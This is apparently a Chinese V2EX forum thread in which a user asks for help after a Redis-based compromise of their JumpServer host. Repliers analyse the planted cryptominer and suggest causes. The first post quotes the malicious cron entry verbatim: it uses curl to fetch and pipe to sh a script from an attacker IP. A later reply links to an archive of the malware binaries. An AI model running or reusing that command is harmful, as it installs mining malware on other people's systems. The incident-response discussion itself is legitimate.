服务器被马了,求帮忙

2019-06-21 09:43:42 +08:00
 xiaotianhu

公司用了个 jumpserver 做跳板机,之前运维同学弄的 版本 Version 1.3.2-2

今天发现连不上了.

进去发现 redis 出了问题.redis 是本地启动的,监听内网端口 排查发现 rdb 文件写入没权限,写入目录 /etc/cron.d 这...肯定不对啊.发现写入了一个文件:

文件内容 */1 * * * * curl -fsSL http://103.35.72.209:8667/6HqJB0SPQqbFbHJD/init.sh |sh

被马无疑了.但是写入报了权限问题?这个文件怎么还写入成功了.

现在想研究一下这个马,然后对服务器得全处理一下了.头疼. 这个马怎么解 shell 玩的不好,求帮忙

9397 次点击
所在节点    程序员
49 条回复
kzfile
2019-06-21 20:12:59 +08:00
我用的 windows server 跑的 redis,狂毒写入了脚本,但是跑不动 :doge
rootliang
2019-06-21 20:26:03 +08:00
@defunct9 #32 我还以为 SSH 老哥被封了心里一紧,还好放出来了:doge:
onepunch
2019-06-21 22:46:06 +08:00
之前服务器也出现过挖矿病毒,会有一个叫 http 的进程, cpu 直接 100% ;仔细看看进程有没有问题吧
qwqVictor
2019-06-22 14:37:30 +08:00
闲的没事在 Docker 里执行了一下,用 bash -x 还原了执行过程,然后抓出来三个 binary,楼主拿着它研究一下,最近没啥时间不然我也研究一下。
三个 binary、原脚本和执行过程的输出都打包了: https://cloud.qwq.ren/s/cmcjRJSGXdTmr6f
另外扫了下这个马下载服务器的端口,发现它挺空的,估计是专用来下载马的。这个 IP 的 AS 号为 AS134520,属于 TechAvenue 公司,估计是 GigsGigsCloud 的机子 (我自己的转发机也是 GigsGigsCloud 所以很熟 233333)。你可以尝试联系服务商举报这个机子滥用来报复他一下 233333
qwqVictor
2019-06-22 14:45:14 +08:00
sysupdate 似乎就是挖门罗币的 xmrig
xiaotianhu
2019-06-22 22:53:26 +08:00
@kangmang92 我的 redis 因为没有 root 权限,所以他没执行成功 失败了.

你用关键词 redis 挖矿 去谷歌 ,有很多案例 写的很详细,如何处理.可以参考.
xiaotianhu
2019-06-22 22:54:26 +08:00
@liuyi_beta 是这样,我也用这个方法分析了一下,感谢.
xiaotianhu
2019-06-22 22:59:09 +08:00
@imlz 应该是 redis 的问题.跟 jumpserver 不知道关系大不大

但是我 redis 监听是内网端口,无密码.机器在阿里云 vpc 内,我理解的外面的人应该是无法访问我 vpc 内网的 redis 啊,只有 jumpserver 的 web 和 ssh 有外网权限.ssh 有问题阿里云会提醒,但是并没有 ssh 相关报警.

所以怀疑是 jumpserver.这机器上没有其他的业务用了 redis,但是有在跑一个 zabbix 的 client
realpg
2019-06-23 02:36:06 +08:00
@xiaotianhu #46
挖矿需要啥 root 权限……
而且都成功写入 cron 了……
没执行大概是你的 cron 服务有问题

基本上这类挖矿的都不要权限,甚至大量 nobody 执行的(多见与垃圾 PHP 代码被注出来的)

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/576076

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX